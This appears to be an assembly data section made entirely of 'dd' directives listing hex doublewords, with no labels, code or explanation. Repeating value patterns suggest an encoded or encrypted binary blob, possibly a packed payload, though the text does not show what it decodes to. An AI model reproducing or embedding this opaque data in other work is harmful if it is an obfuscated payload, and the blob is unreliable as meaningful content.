dd 58581DA0h, 56C0E639h, 67F8A85Bh, 0BD3CCDF7h, 30D968F8h
dd 0DCECB797h, 0F3B8E8D8h, 0C882CC4Fh, 0D870EB7Bh, 81207898h
dd 784DF85Dh, 0E166B008h, 5872E8B8h, 3D202D77h, 383D6818h
dd 7699DC07h, 0D58FD707h, 4838F83Dh, 81172358h, 88A8527Ch
dd 0C8188539h, 9DE5B8C8h, 78F8FA5Bh, 6A177DFBh, 5338C4FBh
dd 3B201274h, 0ADF5F118h, 88E8C235h, 0A493434Bh, 0F6F8EF01h
dd 90EF741Fh, 8869580Bh, 6D48BD07h, 0CCABF8C8h, 37382D78h
dd 7756FA8Ch, 0D872FF47h, 800B9E2h, 1038E8DCh, 88E9D808h
dd 0ED48BD87h, 0C8AD78C8h, 0C6FD2CD7h, 88C227F7h, 581880E8h
dd 882B88Ch, 0AFB48099h, 0E0385962h, 581928F9h, 3D786D77h
dd 3290A818h, 77A85908h, 982D382Dh, 86D5088h, 2C51E8D8h
dd 0E21727F6h, 0D2FB7178h, 9DD772E2h, 38389D64h, 0B6B29E3h
dd 182D9805h, 8CE7B888h, 747966Fh, 88685EE0h, 1C4C66F8h
dd 0F728B4C4h, 78CD20CDh, 0FB1DD508h, 0EB1828AFh, 0D8D53541h
dd 0C9B8A8EDh, 0CE004B03h, 5B18287Ah, 481D8035h, 0BC77A8D8h
dd 7757260Bh, 6DCC6D33h, 7817B8C8h, 6D3DE759h, 368183Bh
dd 182DC07Dh, 9580788h, 0B1A2DD7h, 0D235848h, 0D8585D60h
dd 8769C877h, 388B015Dh, 54655308h, 3B18684Dh, 9598781h
dd 0B8E2D57h, 7A40D848h, 0D5E71745h, 48DEF635h, 9277E358h
dd 77B1AE08h, 0B99B2C88h, 0B68928Bh, 3892FFA1h, 3D254062h
dd 0D8587D27h, 868A431h, 0F56C63D8h, 7716950Ch, 737ED787h
dd 8657C05h, 5E78A8D8h, 8CEF55A3h, 0F4FCDA13h, 0F30A13EEh
dd 36D06832h, 3685861h, 0D3184234h, 6028924Ch, 30F8A858h
dd 0DAF91862h, 274866D2h, 485D581Dh, 0BC3BB0D8h, 0E126B048h
dd 0C932878h, 0C4A378E2h, 3812E8B2h, 0E2FADA62h, 31D680B8h
dd 882B888h, 0A8470209h, 0BD8CCDF7h, 14728B8h, 8C27070Dh
dd 0C707557Fh, 98A8ED85h, 0ACA168F8h, 8368B882h, 0F91D1B37h
dd 0C8F8D8E5h, 949DA578h, 0F728389Ch, 0D8ED2538h, 0DAA89810h
dd 6D847D47h, 1E00B8C8h, 0B4B86858h, 0FD033767h, 316A7888h
dd 6D4491FEh, 59AECD3Fh, 0C9CD2D64h, 4DE738B8h, 8288DC0h
dd 4DF46D51h, 0DCB8D848h, 27720812h, 3DC4ED77h, 0F8FDA898h
dd 1E97AD57h, 0E4EEAD2h, 9826C03h, 0F8A9800Ah, 0ED3B5808h
dd 2D7A4DBCh, 615AA8EFh, 5D94C12Eh, 0DEA83D6Fh, 0ED54FD47h
dd 0CCE3B8C8h, 28EEBE8Eh, 1D178F5Eh, 0D8581DA8h, 5F38BC0Bh
dd 0D443D27h, 88C2D848h, 0CDE7EAD2h, 8A88DF8h, 0F8B940E1h
dd 6943CF08h, 0C3C2471h, 0A4BD07DFh, 0BF8E86Dh, 0B40DDBFEh
dd 0D818288Eh, 9D97EFDCh, 78F8DD68h, 0D49C188Dh, 0DCE6AB3Eh
dd 7CD796FAh, 3812A0FCh, 1D57F262h, 5858DD10h, 0D49C780Dh
dd 0FC8580CBh, 415B5808h, 6128CB69h, 481EC40Dh, 0B9D0DD58h
dd 88A5F6C9h, 884C38B8h, 5838E9DEh, 102D178Bh, 0DE8983Dh
dd 0D76C71B8h, 0C0C77h, 0E442D57h, 2440D848h, 0BE71745h
dd 3DD42D77h, 60536818h, 89409C89h, 0A74F28F8h, 481DC41Dh
dd 0C31D4158h, 0C125A7F7h, 804030B8h, 8417688h, 78B58DD8h
dd 88E8D908h, 0D8182878h, 8287888h, 6B2EF9D8h, 0BDE04DF7h
dd 1B3E8F8h, 7D283C24h, 3B568AA3h, 0FB091A54h, 3579669Dh
dd 6A679CEDh, 4C9BCD32h, 0BBFF047Bh, 0B14E378Ah, 81DCCFAh
dd 0ACC9BB4h, 8886BD64h, 0B97D5A3Bh, 616E1DFCh, 3839CDB4h
dd 0E9CDAA4Bh, 315E8DCCh, 69A5DDE4h, 96D11828h, 0CB68196Fh
dd 2C794D8Ah, 675AA8EDh, 4B8BCD3Bh, 0FAEB5849h, 0BD6C09DDh
dd 6705DDDAh, 10EC8DACh, 0EC89BD7Ah, 0BD6A6B78h, 5C4D0CE9h
dd 591DDAB0h, 0FAEBD86Ch, 3D6C89DDh, 6487D7DCh, 88D40D30h
dd 0E63B6A3Bh, 306B5899h, 4D288CE7h, 6C8CC120h, 0E9CD2A60h
dd 0B15E68DCh, 613CDDE4h, 17EC8DB5h, 0FC9BA15Bh, 0B14C451Dh
dd 4F281DE5h, 513EDCBDh, 0FCE9BD64h, 3A719ACCh, 7B8DCCFDh
dd 9DFF6819h, 0E4011E7Ch, 22717B9Dh, 6D6FF8EDh, 5491EE2Ch
dd 0E5C10C6Dh, 0BD5F68DDh, 6C07F5FCh, 30DD84ADh, 0E48CB669h
dd 9F18691Dh, 6D7C0CEDh, 513ED8B5h, 0E9E6BD64h, 58598DD5h
dd 5C9CDDCFh, 0A8C8053Dh, 0C9002C69h, 2C7D6FF8h, 7B5A9DDEh
dd 3896C731h, 0DEDC3D4Fh, 0B16B1ADDh, 702DD6E7h, 17F4E899h
dd 0E1A4BC69h, 0AA795A1Ah, 452839F1h, 512ED8B9h, 0EEE7AF6Dh
dd 3D7481FEh, 6D98F788h, 94D12E36h, 0F809156Dh, 3F764188h
dd 7867F8C9h, 4AA8C63Dh, 0FBCD3B67h, 0AA4868CBh, 7B0DDBE7h
dd 3E8ADBABh, 0FC9BAA61h, 0B76A7878h, 7B5B1DEBh, 5D369AEBh
dd 0DBA8AC70h, 315E9CDDh, 7CA9DDE4h, 9AD11A2Ch, 0FB0D2C7Dh
dd 3D4B28B9h, 6441BEFCh, 5591FC3Dh, 0E4FB586Dh, 0D8680DDDh
dd 7C1BC1DBh, 11EC85BDh, 0E7BCBD65h, 0BD74413Eh, 6D4511DCh
dd 5516FDD8h, 0E1FEA869h, 3E579FDDh, 6D84D1CEh, 8AD13E58h
dd 0E4092D7Ch, 377444B9h, 7A7FF8EBh, 7E9DDC31h, 88CD3461h
dd 0BC591CF6h, 7C1BCDE2h, 0ED19A88h, 0EF8DB461h, 0B74C5B1Dh
dd 8461DE3h, 4A3BDC96h, 0EDDCB96Dh, 3D7481FEh, 4B9CF688h
dd 8CD90D2Ah, 0E71A086Dh, 2B6B4D9Bh, 4B5CB688h, 4C99CD2Ah
dd 0E7DA086Dh, 0AB6B0DDBh, 4668C0CDh, 1DCAABACh, 0DB8DAC69h
dd 0B16C4B1Dh, 462816E7h, 4819E5ACh, 0FFCDB15Eh, 3D4B8EF7h
dd 6781CCEBh, 8CF66836h, 0E60D2847h, 3D7441BEh, 475CB688h
dd 6896CD28h, 0EDCB377Ah, 0B74C1BCBh, 806DDE3h, 0AE89C96h
dd 0EB8DAC67h, 0AA717E0Ch, 64490DFCh, 5715CD95h, 0C6A8A17Ah
dd 316ABFCCh, 61BEDDFCh
dd 99CD1C2Ah, 0E50D1564h, 58615A97h, 5D448CDAh, 579BC136h
dd 0FCFB3D6Ch, 0BF7601CAh, 6629D7DCh, 0CEB81ABh, 0EF86B17Ah
dd 994B7F78h, 7A490CDBh, 3808DDACh, 0FBC7B46Bh, 3B779BDDh
dd 89CDDE3h, 96D6073Bh, 881C3B6Dh, 306C4D9Fh, 6A5C8BE7h
dd 5599C621h, 0EDDA586Dh, 0AB181EDBh, 80CD6EDh, 13DB87ABh
dd 0C1E8AC6Dh, 0AA7D5C16h, 4B5C1DE6h, 5D0BC7B4h, 0ECC6B940h
dd 11188DD4h, 7A8DCCE6h, 0BFCC0D36h, 0E72B2C6Dh, 3B7D4696h
dd 5B4C9DFCh, 5D8CC92Ch, 0FCC61108h, 0BD761ADDh, 6D18F7FCh
dd 31B8A9B6h, 0FA8DAC66h, 976C4D16h, 5D461DF8h, 3839C4AAh
dd 0EDDCB641h, 2C7D86CAh, 6C89DDDAh, 9DD4011Eh, 0DE2C1908h
dd 6B5178B9h, 446CD6BAh, 5DAAA814h, 0E7C41B6Fh, 0BD530DCBh
dd 6D3AB8F1h, 1DC8A7BFh, 0F18D9366h, 0D859503Dh, 594F1DDAh
dd 410ACDADh, 0FDC4B95Eh, 1960ADDDh, 6F8DEA88h, 0AECC0D0Bh
dd 0ED1D3469h, 585950BDh, 232D110Bh, 3890F990h, 5405808h
dd 0B21B4CF4h, 596DD288h, 7DD2BB88h, 3B81483h, 0B24C78ACh
dd 5B7A29C8h, 0D883D27h, 4C2BD848h, 0AC8D17B4h, 8BE8F8BDh
dd 0AF7B609Ch, 9DD9DD85h, 0A72B28B8h, 622892D8h, 9C6D5756h
dd 0DA8183Dh, 489C6778h, 5868B888h, 78D126B0h, 0E23C5308h
dd 0B2D4A378h, 82810C8h, 3A12A8C8h, 0E0A8B25Ah, 58188176h
dd 5BB9B8E2h, 1C2D9708h, 0D768183Dh, 648DD7A1h, 8D28B8BDh
dd 0B3A4DCA7h, 0C8BDD085h, 55148BB8h, 4878B81Dh, 2F69EBD8h
dd 33A275Bh, 982DFCFDh, 9CA7F588h, 0D078A8FBh, 7757275Ch
dd 6DF06D33h, 8765B8C8h, 0F8B84BB9h, 77971BE0h, 809DA307h
dd 8528B8BDh, 38DB40D7h, 779AB008h, 5D939747h, 8288D54h
dd 73CC285Dh, 0AB1D5785h, 0C5F02878h, 83D78777h, 6DBBF71Fh
dd 88A8D8E0h, 0B599B5B8h, 8A8A29Ch, 7D35A16Bh, 882845A6h
dd 9497CA9h, 0F779A9D8h, 78CDC4CDh, 0ACACDF08h, 0ED24FD47h
dd 0CA35B8C8h, 90EDE8DCh, 88E8D808h, 9BF5A925h, 62283892h
dd 36ED2527h, 0D8A89812h, 7C3825EAh, 8BE89288h, 3FDE649Ch
dd 0C8720C8Dh, 9F38E5F8h, 4832AE0Dh, 12F88C58h, 0E26B0508h
dd 271902B9h, 0C1B47BBh, 0B83DFD27h, 8380287Ch, 53182878h
dd 582B2358h, 4ACD25E4h, 3A89812h, 5819E402h, 623388h
dd 0FBB86859h, 0E8A373F0h, 0FEEBE373h, 4F2D8CE9h, 0FA135DBAh
dd 0DFA79F8Bh, 534BBC33h, 623CE844h, 12EAB998h, 787D27F7h
dd 5B18684Dh, 9DA3744Ch, 38389DACh, 622B0F23h, 321F2FBFh
dd 81E85088h, 927B6B0Fh, 81800012h, 0D51828F8h, 0F68299CAh
dd 0FB08DD91h, 0BEEECD61h, 5C1D68F8h, 812AB080h, 388EAE4Dh
dd 4B0A2F08h, 0D818C02Dh, 89757888h, 7863A135h, 0C2355308h
dd 0DB18A88Eh, 8E09CF4h, 0F801EC57h, 64E95808h, 58182AF0h
dd 92C90DCh, 0AD07A858h, 88E86D98h, 5C959433h, 869BCACh
dd 78D2B8D8h, 88E8DCE0h, 8C4A7E78h, 9DD72F88h, 38389D54h
dd 1F25113Bh, 5818E9BCh, 0A82E9D9h, 90B90209h, 0C8685808h
dd 48DD7AAh, 9E28B8BDh, 638C5EDDh, 8CC00C58h, 8F1868B9h
dd 284C0C77h, 87B8E8DAh, 0C8DEF09Dh, 189D7178h, 1CCB6EFCh
dd 52AC2388h, 0DFF98A08h, 948D17EEh, 51E8F8BDh, 28CDA8DDh
dd 0B4FDA75Eh, 0D51868CDh, 5F7ABCDFh, 0B5A0EC32h, 88A95C9Fh
dd 182BC3B8h, 0FB31A8E2h, 28E8B873h, 0D8B88858h, 0BC8DD72Ah
dd 892838BDh, 387AA01Ch, 0ACDC2708h, 408D17B0h, 5BE8F8BEh
dd 0CEA0FDA7h, 4A355848h, 669828FCh, 4E298D82h, 2D7C25D3h
dd 914B5848h, 0C818FD35h, 0D96BB8C8h, 0FC6A178Eh, 9760D7C8h
dd 0D7182879h, 829680Ch, 24628D8h, 8EEC87Dh, 0DC17E886h
dd 8E8B989h, 8D9856D8h, 0B6E91EF9h, 1F5661A8h, 0C7A3BAFDh
dd 77F9EE9Eh, 0E2F99623h, 8B4E39B8h, 3E782D77h, 43E1E898h
dd 576DD7C9h, 55182878h, 4835DA0Dh, 5078C2D8h, 88A8D804h
dd 0CDE7BBE8h, 8A88E98h, 0F8B86465h, 37ED5708h, 0B11828F8h
dd 828F839h, 6AA896D9h, 0DA70E41h, 0D818681Dh, 0A4607E0Bh
dd 0FCB7E5E4h, 88E8D891h, 2B6D0844h, 7124424h, 3878245Dh
dd 0A8A57508h, 6538C898h, 7C8DDFA9h, 0C414172Dh, 9142D28h
dd 3038D786h, 795D8CFCh, 48FBD6D9h, 0FD877732h, 275FAED0h
dd 0B259B788h, 78B8CFC8h, 77BA3AFFh, 982D94EDh, 58E84B88h
dd 0D028F888h, 88A8D801h, 366F87FCh, 6C89D7E4h, 0D82D9758h
dd 0D68183Eh, 6B2E5C38h, 42AD7141h, 69F8E86Eh, 88AA5860h
dd 8E493938h, 2CFD47D8h, 0F5B8A8EEh, 0C8F3DB9Dh, 112B7878h
dd 5A7829DCh, 0AD87F989h, 88E8ED64h, 0A73CEC3Fh, 48DD841Dh
dd 787B9058h, 0C87D2F85h, 9BE129F8h, 5C6EB7DBh, 7DAAE90Fh
dd 0EBC11554h, 0B76B07CAh, 5F34CCEEh, 17DC86B1h, 0CBB4AB7Fh
dd 0BD6A5A0Dh, 6D7E0CE6h, 5711DBAAh, 0F0ED8466h, 2A7784C8h
dd 5CE8CAEDh, 9DDF1A39h, 0FB07107Ch, 581A288Ch, 8570877h
dd 4A88A958h, 0E5C12067h, 0BB6A0196h, 6904D9EFh, 89691A0h
dd 0C1A6D864h, 0B438633Bh, 6D4114F9h, 3212C1BDh, 0DAED8B5Dh
dd 6A289898h, 39D88DB8h, 0D6984678h, 0C2456228h, 785661B7h
dd 7A418EAEh, 6DF2DD2Ch, 88A858E0h, 359935B8h, 828A53Ch
dd 6DCF6D1Eh, 77E8D848h, 982DBCEDh, 17C0B988h, 261294ACh
dd 0BDF86D83h, 0F441E8F8h, 229D96B4h, 786E93Eh, 54B2D15h
dd 182E6845h, 0A5E7388h, 9D9E0D0Fh, 0BBC2DD85h, 5D9768F8h
dd 8288B18h, 82FE6122h, 73169684h, 17FA29C9h, 8DA53B63h
dd 3838BD69h, 0E2A8B258h, 0FC8D17B6h, 8BE8F8BDh, 0FCB04C24h
dd 8C80737Dh, 0B1828F8h, 0F728BBCEh, 78CD20CDh, 74E0B008h
dd 0DFF09747h, 5B68B888h, 37E7AB9Eh, 1D17D85Bh, 0D8581DF0h
dd 0F7D44960h, 0CB2E4027h, 55727F7h, 5858FBBBh, 8E8B360h
dd 0BDEB3D58h, 0A65A6B5Ah, 585464BCh, 3DB46D77h, 3210A818h
dd 0FFA85808h, 0B16A18CBh, 490ECCE6h, 0ED47B8D8h, 88A8ED40h
dd 0ED4CADF1h, 392778C8h, 20982555h, 0D21D848h, 5858DEFEh
dd 947D47D9h, 6BB8286Dh, 88685C60h, 0B5ADA5F8h, 5128B890h
dd 0ED415D5h, 5E405848h, 0BEE7974Eh, 150F3D4Fh, 8847E898h
dd 95817D8Bh, 55182838h, 48355F1Dh, 522CF8D8h, 0DAA8B209h
dd 5818EAD0h, 387D4708h, 7DB8286Eh, 0AA1D02C8h, 4542A575h
dd 627AF8C8h, 5F4D255Eh, 0DCA81815h, 894838EEh, 3CFD47DAh
dd 20B8A8EEh, 0BEC44DF7h, 5DDE2838h, 86840C5h, 387440D8h
dd 0DBFFD808h, 6B53ABF7h, 44AC96BAh, 6D476814h, 88286D94h
dd 581F406Bh, 0BDA5F888h, 38B8B01Ch, 7415D551h, 3018288Dh
dd 0F7974ED9h, 78B8E430h, 0C6A18F08h, 8C5D6631h, 44643CA6h
dd 0A4ED57D8h, 0DA8983Dh, 0BF9CE778h, 9BE8B889h, 0F8B86D30h
dd 0ADDD508h, 11868E0h, 3E304505h, 2210A818h, 0B57A7FEh
dd 982E7405h, 8C67B888h, 78B8E91Ah, 89783489h, 0B04C2878h
dd 8287989h, 0D843D27h, 4C29D848h, 5818E928h, 623C33D8h
dd 6D473A58h, 88286E14h, 2D41E87Dh, 1BA09085h, 0AD07A858h
dd 88E86DB4h, 659B8A53h, 828A5E1h, 0F5919DD8h, 0C8F5B58Dh
dd 4DE77878h, 8684E80h, 0BC77685Dh, 88A8D933h, 0D314A833h
dd 87D84788h, 0B8A501DDh, 0C5ED9E08h, 591868C0h, 942F8E2h
dd 0AD07AA32h, 88E86E1Ch, 0D7E7903Bh, 869AA0Ch, 0ED357BD8h
dd 88A8C56Dh, 8B4A3812h, 3E2CED77h, 0F8FDA898h, 885A5D07h
dd 0E595E8B8h, 8A8A50Eh
dd 445060E9h, 0E097A7F2h, 5818286Ch, 81CED3D6h, 0C7AC8C6Ch
dd 0C89DC09Dh, 4CA5E5B8h, 0B968F895h, 822500D9h, 0CC6327F7h
dd 38D9385Ch, 2C6C7380h, 309869DCh, 808C9C03h, 581D00E8h
dd 26CDB888h, 0AFB8106Eh, 0BD3CCDF7h, 9C9B28B8h, 0E6F3E84h
dd 0B96D2578h, 0E2A81815h, 0D83900B8h, 5B3AB888h, 4EA87D27h
dd 0F465D848h, 274F3C5Ch, 481D201Dh, 7C6ED8h, 88C29802h
dd 0A74BBFE8h, 48DEA81Dh, 755E6B58h, 0C875FAB5h, 301842F8h
dd 828F884h, 0AD07FB0Fh, 88E86E18h, 0D8186485h, 8525CD88h
dd 388EA66Dh, 0C5655508h, 0F3186840h, 59281246h, 0AD87FB8Eh
dd 88E8EE04h, 2618103Bh, 0F66329A7h, 0CEF6DDD5h, 85D85848h
dd 486D860Ah, 0F2D010E8h, 4A9957A7h, 5A1BB1Fh, 32F369CFh
dd 0C6437703h, 4EF65555h, 2C1BD848h, 61F3DFFFh, 8BD87DBh
dd 0B878E8EEh, 0C8BDAFB5h, 726CE9B8h, 89D88E0h, 442D9758h
dd 868183Dh, 18206545h, 195CF888h, 25912D9Fh, 88A85848h
dd 5DDE68B8h, 82880C5h, 86EE01D8h, 0D2F27F7h, 0D8583DF8h
dd 88287888h, 387C6A85h, 0A8E7D205h, 367787D6h, 288ED7A8h
dd 9DDE0134h, 0A8277829h, 3D75418Ch, 28478CA8h, 5D94CD3Bh
dd 0FCC92A6Ah, 0D21549DDh, 284898A8h, 0B98A7F8h, 0ED85B57Dh
dd 0B97F080Ah, 664D1CFAh, 6A72A5F9h, 0E6CDB46Dh, 2B7D84CCh
dd 2891D4FBh, 88C80930h, 0E6097871h, 207D089Ch, 7C4B9DF8h
dd 148CC639h, 0E9DC2B28h, 0B6710CD6h, 254882EFh, 19EFE2D5h
dd 0E180BB7Ch, 0B9384F16h, 6C0814E4h, 5958D1B9h, 0E688BC66h
dd 2C708FD1h, 678E98A4h, 8ADE482Ah, 0EC063D61h, 7851088Bh
dd 7C4199FFh, 6FF2A562h, 0EDDA3D60h, 0BD6A0998h, 7D07C1A8h
dd 0ADEC8F4h, 0EC86BD61h, 9B38170Bh, 294D15E7h, 180CE1F8h
dd 0FC88AB61h, 797D85D1h, 2F9CF1A8h, 99D4482Bh, 85493D7Ch
dd 9F9C2CF2h, 0AE3CD1B8h, 93A1FF48h, 0E4640432h, 0EF4A207Ah
dd 0DC1155C8h, 0DEACFB97h, 305B8A18h, 69E2CDA0h, 0E18BDAAFh
dd 0A1D5EFD4h, 0E651B26Ah, 2BD996D8h, 96528292h, 0F8B868F4h
dd 88685808h, 581828F8h, 828F888h, 38F8A858h, 88A85808h
dd 0D81868B8h, 868B888h, 78B8E8D8h, 88E8D808h, 0D8182878h
dd 8287888h, 3878A8D8h, 88A8D808h, 5818E8B8h, 8E8B888h
dd 0F8B86858h, 88685808h, 0FD9B48F8h, 868C12Eh, 925D2B58h
dd 88A81831h, 0CC5BDFB7h, 770EB05h, 7BBEA36Fh, 0ACAC53D8h
dd 0D45A035Ch, 4A1361FAh, 0B36CDBD0h, 0CA83CC4Ah, 0FE8D61B4h
dd 81E8F8B1h, 0B881C2DDh, 0B6DB308h, 81FA003Ah, 82C3AE9h
dd 1A0F2DD0h, 0EC405848h, 0B01868B8h, 868B897h, 5A9C6D55h
dd 0B1B1D848h, 5B145C60h, 0FFCA7C48h, 1F62D27h, 7F6BD848h
dd 0AF95EB61h, 0EBE8F8AAh, 4C89748h, 60EB5887h, 0D1EECAFCh
dd 480ADC15h, 38C22B58h, 0BA835D7Ch, 55081ABBh, 533044C6h
dd 78826B86h, 0BA17DC7Ch, 0AAE72B93h, 0F77F9098h, 0F6535727h
dd 0B1025523h, 5B40E8F8h, 872B8CC3h, 0B881FADDh, 6ED9F08h
dd 581868C1h, 0E028F888h, 38F8A864h, 0B126DD83h, 0ADF068F8h
dd 0E097477Fh, 78B8E8C0h, 0B166658Bh, 0AD182838h, 0A8B5F180h
dd 0D378E8FAh, 6252794h, 9B18A881h, 317A3D07h, 6D316818h
dd 88286186h, 58182B10h, 0CBE1CB88h, 38783BD3h, 60FA5808h
dd 27E79655h, 31C22D8Bh, 0AEBBE898h, 88E4A28Bh, 0D91FAC77h
dd 72AB7888h, 0BC77A8C8h, 88A8D8F5h, 814AA33h, 0F7167060h
dd 523D6BA7h, 8B681831h, 5092783Eh, 7C280108h, 16012841h
dd 63E85B7Ch, 0D950E349h, 0D7B75909h, 81393707h, 88A4944Ch
dd 0F341C40Dh, 0F2D1FB40h, 38CF27D7h, 9CED808h, 6A2B16C0h
dd 8433D87h, 7BEE6858h, 8D1D5832h, 0B3086273h, 0B22738Ah
dd 4A10F9A9h, 8B57A7F6h, 9821C20Dh, 0C8ED1588h, 0FCB713A0h
dd 88E8D88Ch, 0E1B29D87h, 0E07878C8h, 0C787568Dh, 0B1025D0Bh
dd 0DD97E8F8h, 8A88122h, 0AB9C6C5Bh, 0BB6A988Bh, 50AE2723h
dd 0C1A8EA6Bh, 1C39FB78h, 94815C2Ch, 0FC14419Ch, 0E183F8D3h
dd 0AFB71359h, 0B69C05B3h, 9DB0D3F9h, 3E5CA3E6h, 3215359h
dd 0A6DC27A9h, 7ACE1339h, 2E9C143Dh, 112B93D9h, 961CAB50h
dd 0B165D379h, 1E5C0BD0h, 7BE53D9h, 86DCB92Dh, 0E7289339h
dd 0E1C59ADh, 412A7D27h, 61B3D848h, 27E7D709h, 1CEAFBD6h
dd 0C7864731h, 0E2A91BF7h, 4DF0B0BCh, 8017477Eh, 0B89CB9CDh
dd 0B9D03E08h, 98FA2AE0h, 0EA2AFB6Ch, 3E92033Eh, 7D52B050h
dd 1A9B9747h, 62B93F80h, 9550B0DDh, 81727FDh, 0D36B2B82h
dd 8D2A2838h, 38388C09h, 0E28F33A2h, 0D8B2B0D0h, 109DBB72h
dd 355079E8h, 3097A7FDh, 581828F9h, 55C2A0Ch, 0F2064889h
dd 8D43AEE3h, 0D8186800h, 0B78A1308h, 4405651Bh, 7FE8983Ch
dd 982C19FDh, 8287888h, 887BDC58h, 0D5F7268h, 5858DC89h
dd 9E8B88Bh, 0F84EEC57h, 0DDD05808h, 0F3F0C473h, 9E957123h
dd 88F8E861h, 7F03F2E0h, 982C593Dh, 868B888h, 0E20561D9h
dd 0FCE89831h, 0E99DDF33h, 82838BCh, 807AA8D8h, 0BE57BC6Fh
dd 3FA0EDCDh, 0A3C633ECh, 0F8B8D03Eh, 8B1CF36Eh, 0AFB27548h
dd 481CC90Dh, 38F8A858h, 0E525E000h, 0CE6D68B0h, 3C593D7Fh
dd 78B8E898h, 0B50DC08h, 0AC1820BDh, 0E5ABC08Dh, 77D3A820h
dd 0BC995DFFh, 581BE8F8h, 0C9CB888h, 531281E8h, 0B1FEDD83h
dd 979328B8h, 40A130A3h, 97D5FA4h, 8BA8183Ch, 0AC1868B8h
dd 6C0F00D7h, 0C531DE27h, 88A8E196h, 0D81890D3h, 0B0831CEFh
dd 38788E51h, 761530A3h, 78A81747h, 0F7147760h, 9E818BA7h
dd 0EE7DA7B0h, 0D3B3B953h, 481CC91Dh, 0CF2A5F58h, 88A85BCAh
dd 300C1DB8h, 0F797461Fh, 0D150F768h, 0EE1727F4h, 0BE0DD7C0h
dd 8383E923h, 0A6FD2317h, 0A3A89831h, 0A4506170h, 3CD93D7Fh
dd 0F8BC6818h, 9A1C5808h, 0A6D80140h, 905340h, 93FCDC98h
dd 63502DB0h, 5DEFC3DFh, 8288CB9h, 78B8E8D0h, 3568927Dh
dd 0D8581C57h, 0B0690C88h, 0F151B0F1h, 0BC837D02h, 0BCD8E8F8h
dd 234DB28Bh, 53B8286Ch, 2C2E9B8h, 182C077Dh, 48985288h
dd 0CD32D52h, 0EE025848h, 2FE58A00h, 485C890Dh, 78B8F8D8h
dd 38EFAC08h, 607E8231h, 0A34E84FDh, 0BD24068h, 352173C8h
dd 5858D13Ah, 3CD93D7Fh, 0F8986818h, 811D5808h, 0DD127048h
dd 868CCA1h, 0B940CEF2h, 0B92DAFC8h, 9818288Ch, 7C68B888h
dd 507C68DBh, 0BCC17D02h, 737E2838h, 31AEC501h, 0CFD3A898h
dd 0C89CE98Dh, 5818E8B8h, 0B8E1CDC8h, 0D13D6A08h, 2268183Ch
dd 6C29AD0Fh, 8A8F8C8h, 338DA858h, 0DA2E0B8h, 0D8585C92h
dd 6E555322h, 8FA0D960h, 0C8DCE98Dh, 0D8192878h, 0B82A0C88h
dd 12DDA2F1h, 48A8983Ch, 0FD12EB5Ch, 8A88CA2h, 40DEC33Eh
dd 0D9FA889h, 58581CC9h, 828FA88h, 0F04CAA2Dh, 0BC82FD02h
dd 737E68F8h, 31CA0501h, 4400E898h, 23E8D82Ch, 0EC29AD8Fh
dd 82078C8h, 540CA8D8h, 0BC995DFFh, 5C18E8F8h, 39DB888h
dd 7DB2D0E8h, 88286C23h, 0AF55C352h, 481CC90Dh, 38F0A858h
dd 0EEB92D08h, 0D2F8EB00h, 485C932Dh, 4B138ED8h, 9D0372C8h
dd 0C031901Eh, 3C03DD82h, 0DCB8A898h, 0A30DD20Bh, 3E18A88Ch
dd 396D4F23h, 0F8B8286Ch, 0EE685818h, 2CD8A940h, 0EC788Bh
dd 0CD30D52h, 23CE5848h, 0F79DDEB7h, 0A368F8BCh, 4C896D2Fh
dd 88E8D848h, 0D16C6878h, 8D2A2838h, 38389CF1h, 0B92D2FA2h
dd 5818A88Ch, 0B8E8B8A8h
dd 0FCBA1DDEh, 7627D50Ch, 6C318D72h, 85A1F8C8h, 38B891D2h
dd 7428F36Eh, 681F1DBDh, 0F7273888h, 0FD4F4298h, 88A8EC39h
dd 0D8186878h, 394EC0EEh, 11CCAAADh, 9018736Eh, 6C336DB2h
dd 0E828B8C8h, 7008C25Bh, 0BC59DDFFh, 0D81828B8h, 0A5DF888h
dd 9D722EE8h, 88E86C21h, 2498C3DEh, 0B86FCD8Dh, 87F768D8h
dd 0D1F7248h, 0D8581C49h, 8297888h, 78C8A3ADh, 0BC815D02h
dd 0B3B2E8F8h, 8B50DE87h, 0D11D6298h, 0EE68183Ch, 0F2199853h
dd 3C197D7Fh, 38F8A818h, 0A7DD580Ah, 0EC29ED4Fh, 868B8C8h
dd 62CDE8DCh, 0DE218B8h, 0D8581C53h, 3C18DD02h, 0D8B9A898h
dd 0EE10BE18h, 58A84339h, 4858B063h, 0CC93ED52h, 7FC25848h
dd 182C197Dh, 28F888h, 5EE8DD58h, 8240DBB0h, 982C421Dh
dd 0B8C3DE88h, 0C8B003D9h, 0A26DD240h, 7218684Ch, 3C19FD7Fh
dd 3878A898h, 0FD19D818h, 0E07ECDCDh, 0ADE2400Bh, 0F8F85C72h
dd 485BF36Eh, 0D2A50152h, 0FF28B8B1h, 78CC99DDh, 0A8A85808h
dd 69071DB8h, 6E7353FFh, 72A0E160h, 0C8DCF2ADh, 0DBFCE878h
dd 3C02DD82h, 931EA898h, 0B1226521h, 9992E8F8h, 31621D02h
dd 53DE6818h, 0D6A00B8h, 58581CD1h, 39AD0F22h, 3BF8E86Ch
dd 87A95808h, 0D818EF3Ch, 6C0F0088h, 0F533CE53h, 88A8EC39h
dd 0D818D9F9h, 0C9DF7A88h, 3B78A8D8h, 0EF10DD7Dh, 0F3366FDCh
dd 8E8B830h, 8D130E58h, 3D03E0Eh, 0E0B34E1Dh, 0EA79FECh
dd 5E389BF3h, 0B92DAFA3h, 0D818288Ch, 7D69B888h, 493D1F98h
dd 88E8983Ch, 0AC102878h, 85901EAEh, 9FD5FB4h, 88A8983Ch
dd 571AE8B8h, 0E9E2791Dh, 313CC33Eh, 300E507Dh, 0F37E2CDCh
dd 98EB63h, 5EF643F2h, 8AF500B0h, 982C433Dh, 0E3C3DE88h
dd 0D27158DBh, 0BCD95DFFh, 0D8182838h, 285CF888h, 0BD52AF68h
dd 88E8EC21h, 55020879h, 8CCB001h, 0CC91CD5Ah, 6CA85848h
dd 5CDCA8FBh, 0A2494823h, 0D807103Eh, 0BC81FD02h, 737E68F8h
dd 3C593D7Fh, 7898E898h, 0DB9CD808h, 0EC29AD8Fh, 82878C8h
dd 350C88D8h, 88AB1FFFh, 5D6CE8B8h, 0E3422838h, 737FE3ABh
dd 0C851DA85h, 0D1D903F8h, 509804C9h, 0CD12D52h, 7F025848h
dd 982C593Dh, 4868B888h, 1EB49CD8h, 822B88B0h, 982C01FDh
dd 6E229388h, 32985760h, 0C89CF1ADh, 0AFB38EB8h, 48DC890Dh
dd 0F8B86B58h, 7F1B2C09h, 182C197Dh, 828F888h, 0CFF5DC78h
